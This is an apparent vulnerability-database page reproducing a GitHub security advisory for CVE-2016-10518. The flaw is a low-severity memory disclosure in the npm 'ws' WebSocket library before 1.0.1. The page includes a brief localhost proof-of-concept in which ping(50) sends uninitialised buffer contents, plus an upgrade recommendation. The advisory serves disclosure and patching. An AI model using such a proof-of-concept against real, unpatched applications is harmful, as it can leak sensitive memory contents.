Loading HuntDB...
Hunt
Vulnerability Intelligence by wss.sh
Home Daily Briefings High Impact CVEs Recent Exploits KEV Catalog GitHub Advisories Latest Updates Security News
Sign In Sign Up

GHSA-2mhh-w6q8-5hxw

GitHub Security Advisory

Remote Memory Disclosure in ws

✓ GitHub Reviewed LOW Has CVE
View on GitHub

Advisory Details

Versions of `ws` prior to 1.0.1 are affected by a remote memory disclosure vulnerability.

In certain rare circumstances, applications which allow users to control the arguments of a `client.ping()` call will cause `ws` to send the contents of an allocated but non-zero-filled buffer to the server. This may disclose sensitive information that still exists in memory after previous use of the memory for other tasks.

## Proof of Concept
```
var ws = require('ws')

var server = new ws.Server({ port: 9000 })
var client = new ws('ws://localhost:9000')

client.on('open', function () {
console.log('open')
client.ping(50) // this sends a non-zeroed buffer of 50 bytes

client.on('pong', function (data) {
console.log('got pong')
console.log(data) // Data from the client.
})
})
```

## Recommendation

Update to version 1.0.1 or greater.

Affected Packages

npm ws
Affected versions: 0 (fixed in 1.0.1)

Related CVEs

CVE-2016-10518

Key Information

GHSA ID
GHSA-2mhh-w6q8-5hxw
Published
February 18, 2019 11:56 PM
Last Modified
August 31, 2020 6:09 PM
CVSS Score
2.5 /10
Primary Ecosystem
npm
Primary Package
ws
GitHub Reviewed
✓ Yes

Dataset

Last updated: July 4, 2025 6:27 AM

Data from GitHub Advisory Database. This information is provided for research and educational purposes.